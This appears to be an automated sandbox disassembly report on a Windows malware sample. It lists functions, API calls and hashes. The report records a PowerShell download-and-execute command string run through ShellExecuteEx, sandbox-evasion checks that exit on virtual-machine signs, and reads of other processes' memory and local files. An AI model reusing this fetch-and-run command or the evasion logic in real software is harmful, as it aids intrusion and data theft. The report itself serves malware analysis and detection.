                                                  • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                                  • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                                                  • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                                  • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                                                  Function 00413560 Relevance: 9.1, APIs: 6, Instructions: 122stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • strtok_s.MSVCRT ref: 00413588
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • strtok_s.MSVCRT ref: 004136D1
                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02D45BB0,?,0042110C,?,00000000), ref: 0041A82B
                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpystrtok_s$lstrlen
                                                  • String ID:
                                                  • API String ID: 3184129880-0
                                                  • Opcode ID: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                                  • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                                                  • Opcode Fuzzy Hash: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                                  • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                                                  Function 0041B38C Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • __lock.LIBCMT ref: 0041B39A
                                                    • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                                    • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                                    • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041AFD6
                                                  • DecodePointer.KERNEL32(0042A138,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                                                  • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B3E7
                                                    • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                                                  • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B40D
                                                  • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B420
                                                  • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B42A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                  • String ID:
                                                  • API String ID: 2005412495-0
                                                  • Opcode ID: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                                  • Instruction ID: fa90de3286715eaa6817e9c79d9293911763414a7997c4368e9d4f64dee3ff46
                                                  • Opcode Fuzzy Hash: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                                  • Instruction Fuzzy Hash: A5314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                                                  Function 02F16C57 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02F19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 02F19B08
                                                    • Part of subcall function 02F19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 02F19B21
                                                    • Part of subcall function 02F19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 02F19B39
                                                    • Part of subcall function 02F19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 02F19B51
                                                    • Part of subcall function 02F19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 02F19B6A
                                                    • Part of subcall function 02F19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 02F19B82
                                                    • Part of subcall function 02F19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 02F19B9A
                                                    • Part of subcall function 02F19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 02F19BB3
                                                    • Part of subcall function 02F19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 02F19BCB
                                                    • Part of subcall function 02F19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 02F19BE3
                                                    • Part of subcall function 02F19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 02F19BFC
                                                    • Part of subcall function 02F19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 02F19C14
                                                    • Part of subcall function 02F19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 02F19C2C
                                                    • Part of subcall function 02F19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 02F19C45
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F01437: ExitProcess.KERNEL32 ref: 02F01478
                                                    • Part of subcall function 02F013C7: GetSystemInfo.KERNEL32(?), ref: 02F013D1
                                                    • Part of subcall function 02F013C7: ExitProcess.KERNEL32 ref: 02F013E5
                                                    • Part of subcall function 02F01377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 02F01392
                                                    • Part of subcall function 02F01377: VirtualAllocExNuma.KERNEL32(00000000), ref: 02F01399
                                                    • Part of subcall function 02F01377: ExitProcess.KERNEL32 ref: 02F013AA
                                                    • Part of subcall function 02F01487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 02F014A5
                                                    • Part of subcall function 02F01487: __aulldiv.LIBCMT ref: 02F014BF
                                                    • Part of subcall function 02F01487: __aulldiv.LIBCMT ref: 02F014CD
                                                    • Part of subcall function 02F01487: ExitProcess.KERNEL32 ref: 02F014FB
                                                    • Part of subcall function 02F169D7: GetUserDefaultLangID.KERNEL32 ref: 02F169DB
                                                    • Part of subcall function 02F013F7: ExitProcess.KERNEL32 ref: 02F0142D
                                                    • Part of subcall function 02F17AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02F0141E), ref: 02F17AE7
                                                    • Part of subcall function 02F17AB7: RtlAllocateHeap.NTDLL(00000000), ref: 02F17AEE
                                                    • Part of subcall function 02F17AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 02F17B06
                                                    • Part of subcall function 02F17B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 02F17B77
                                                    • Part of subcall function 02F17B47: RtlAllocateHeap.NTDLL(00000000), ref: 02F17B7E
                                                    • Part of subcall function 02F17B47: GetComputerNameA.KERNEL32(?,00000104), ref: 02F17B96
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 02F16D31
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02F16D4F
                                                  • CloseHandle.KERNEL32(00000000), ref: 02F16D60
                                                  • Sleep.KERNEL32(00001770), ref: 02F16D6B
                                                  • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 02F16D81
                                                  • ExitProcess.KERNEL32 ref: 02F16D89
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                  • String ID:
                                                  • API String ID: 2525456742-0
                                                  • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                                  • Instruction ID: 3e84563756217a1831a8b714e09561fe85e4ebfad7b93ca3b2a58a708a041800
                                                  • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                                  • Instruction Fuzzy Hash: FE314575A40208ABDB08FBF0DC55BFEB77AAF14780F901518A306A20D0EF749A04CE62
                                                  Function 02F09C27 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02F09C53
                                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 02F09C78
                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 02F09C98
                                                  • ReadFile.KERNEL32(000000FF,?,00000000,02F016F6,00000000), ref: 02F09CC1
                                                  • LocalFree.KERNEL32(02F016F6), ref: 02F09CF7
                                                  • CloseHandle.KERNEL32(000000FF), ref: 02F09D01
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                  • String ID:
                                                  • API String ID: 2311089104-0
                                                  • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                                  • Instruction ID: 9197280f91d92a9e20250f8e7226c2bc3771851b0047ae3198cee2c7a4eb1e95
                                                  • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                                  • Instruction Fuzzy Hash: 3E3105B8E40209EFDB14CF94C884BAE77B5EB48744F108158EA16AB2D0D774AA41CFA1
                                                  Function 004099C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                  • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                  • LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                  • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                  • String ID:
                                                  • API String ID: 2311089104-0
                                                  • Opcode ID: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                                  • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                                                  • Opcode Fuzzy Hash: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                                  • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                                                  Function 02F1CC45 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • __getptd.LIBCMT ref: 02F1CC51
                                                    • Part of subcall function 02F1C206: __getptd_noexit.LIBCMT ref: 02F1C209
                                                    • Part of subcall function 02F1C206: __amsg_exit.LIBCMT ref: 02F1C216
                                                  • __amsg_exit.LIBCMT ref: 02F1CC71
                                                  • __lock.LIBCMT ref: 02F1CC81
                                                  • InterlockedDecrement.KERNEL32(?), ref: 02F1CC9E
                                                  • free.MSVCRT ref: 02F1CCB1
                                                  • InterlockedIncrement.KERNEL32(0042B980), ref: 02F1CCC9
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                  • String ID:
                                                  • API String ID: 634100517-0
                                                  • Opcode ID: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                                  • Instruction ID: a46953dca59fd677bec50bafc131468164c7be0fc63b6e50918b85c97775616f
                                                  • Opcode Fuzzy Hash: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                                  • Instruction Fuzzy Hash: DC010032E81BA5EBC721AB65984475C7760BF007D4FC40117DE10A72A0CB246841DFDA
                                                  Function 0041C9DE Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • __getptd.LIBCMT ref: 0041C9EA
                                                    • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                    • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                  • __amsg_exit.LIBCMT ref: 0041CA0A
                                                  • __lock.LIBCMT ref: 0041CA1A
                                                  • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                                  • free.MSVCRT ref: 0041CA4A
                                                  • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                  • String ID:
                                                  • API String ID: 634100517-0
                                                  • Opcode ID: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                  • Instruction ID: 84b4572ca590114782b091576b9a89d8360325c6110713fe167f1eb626e4287d
                                                  • Opcode Fuzzy Hash: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                  • Instruction Fuzzy Hash: 5801C431A817299BC722EB669C857DE77A0BF04794F01811BE81467390C72C69D2CBDD
                                                  Function 02F17167 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • strlen.MSVCRT ref: 02F17186
                                                  • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,02F17401,00000000,00420BA8,00000000,00000000), ref: 02F171B4
                                                    • Part of subcall function 02F16E37: strlen.MSVCRT ref: 02F16E48
                                                    • Part of subcall function 02F16E37: strlen.MSVCRT ref: 02F16E6C
                                                  • VirtualQueryEx.KERNEL32(02F17574,00000000,?,0000001C), ref: 02F171F9
                                                  • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02F17401), ref: 02F1731A
                                                    • Part of subcall function 02F17047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 02F1705F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strlen$MemoryProcessQueryReadVirtual
                                                  • String ID: @
                                                  • API String ID: 2950663791-2766056989
                                                  • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                  • Instruction ID: 590ab5b235b4abba308348fb8ea3ba37a74998ce7f171cb95ff28b2163545f04
                                                  • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                  • Instruction Fuzzy Hash: 48510AB1E04109EBDB08DF95D981AEFB7B5BF88340F108519FA19A7240D734EA01CBA5
                                                  Function 00416F00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • strlen.MSVCRT ref: 00416F1F
                                                  • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                                    • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                                    • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                                                  • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                                                  • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                                    • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strlen$MemoryProcessQueryReadVirtual
                                                  • String ID: @
                                                  • API String ID: 2950663791-2766056989
                                                  • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                  • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                                                  • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                  • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                                                  Function 004069B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 155libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID: *n@$*n@
                                                  • API String ID: 1029625771-193229609
                                                  • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                                  • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                                                  • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                                  • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                                                  Function 02F149E7 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrcat.KERNEL32(?,0064A30C), ref: 02F14A42
                                                    • Part of subcall function 02F19047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02F19072
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F14A68
                                                  • lstrcat.KERNEL32(?,?), ref: 02F14A87
                                                  • lstrcat.KERNEL32(?,?), ref: 02F14A9B
                                                  • lstrcat.KERNEL32(?,0064A284), ref: 02F14AAE
                                                  • lstrcat.KERNEL32(?,?), ref: 02F14AC2
                                                  • lstrcat.KERNEL32(?,0064A2C8), ref: 02F14AD6
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F18FF7: GetFileAttributesA.KERNEL32(00000000,?,02F01DBB,?,?,0042565C,?,?,00420E1F), ref: 02F19006
                                                    • Part of subcall function 02F147D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 02F147E7
                                                    • Part of subcall function 02F147D7: RtlAllocateHeap.NTDLL(00000000), ref: 02F147EE
                                                    • Part of subcall function 02F147D7: wsprintfA.USER32 ref: 02F1480D
                                                    • Part of subcall function 02F147D7: FindFirstFileA.KERNEL32(?,?), ref: 02F14824
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                  • String ID:
                                                  • API String ID: 2540262943-0
                                                  • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                                  • Instruction ID: fe26e56553362fcdd0827bd456bcc66cb43873b085b04aa8509c867a9439e324
                                                  • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                                  • Instruction Fuzzy Hash: BE3152B6A40218ABDB14FBF0DC84EED737AAB58740F8045C9B74596080EEB49789CF95
                                                  Function 00412C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                                                  Strings
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                                                  • <, xrefs: 00412D39
                                                  • ')", xrefs: 00412CB3
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  • API String ID: 3031569214-898575020
                                                  • Opcode ID: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
